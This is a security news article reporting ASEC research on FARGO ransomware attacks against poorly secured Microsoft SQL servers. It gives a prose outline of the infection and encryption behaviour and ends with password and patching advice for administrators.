Security experts are warning that FARGO ransomware is being used in a new wave of assaults targeting susceptible Microsoft SQL servers. Database management systems called MS-SQL servers store data for online services and applications. It might be problematic for businesses to disturb them.
Cobalt Strike beacons were dropped during similar assaults in February, and threat actors took over weak MS-SQL servers in July to steal bandwidth for proxy services. The most recent wave is more destructive and aims to blackmail database owners in order to make a quick and simple profit.
According to security researchers at AhnLab Security Emergency Response Center (ASEC), FARGO is one of the most well-known ransomware variants that target MS-SQL servers, together with GlobeImposter. The “.mallox” suffix was once added to the files this malware family encrypted, earning it the nickname “Mallox” in the past. Additionally, this strain is the same one that Avast researchers dubbed “TargetCompany” in a study in February, emphasizing that in some circumstances, information encrypted by it may be retrieved for free.
Statistical data about ransomware strikes on the ID Ransomware site signify that the FARGO family of file-encrypting malware is highly active. The researchers highlight that the ransomware infection begins with the MS-SQL process on the hacked device downloading a .NET file using powershell.exe and cmd.exe. The payload creates and executes a BAT file that kills particular processes and services as well as downloads further malware (including the locker).
The ransomware payload then attempts to erase the registry entry for the open-source Raccine ransomware “vaccine” by injecting itself into the genuine Windows process AppLaunch.exe. The malware also performs the recovery deactivation command and kills database-related processes to make the contents of databases available for encryption. The FARGO ransomware strain blocks specific programs and folders from encryption to prevent the infected system from becoming useless.
The boot files, Tor Browser, Internet Explorer, user customizations and preferences, the debug log file, and the thumbnail database are among the Microsoft Windows system folders that are not encrypted. Following the encryption, the malware creates the ransom message (“RECOVERY FILES.txt”) and renames the locked files with the “.Fargo3” extension. Victims risk having their stolen files leaked on the threat actor’s Telegram channel without paying the ransom.
Brute-force and dictionary attacks that are effective against accounts protected by shoddy credentials frequently compromise database systems. Alternately, hackers attempt to use known flaws that the target has not addressed. The advice for MS-SQL server admins is to choose strong enough and distinctive passwords. Additionally, it’s always a good idea to keep the system updated with the most recent security vulnerability updates.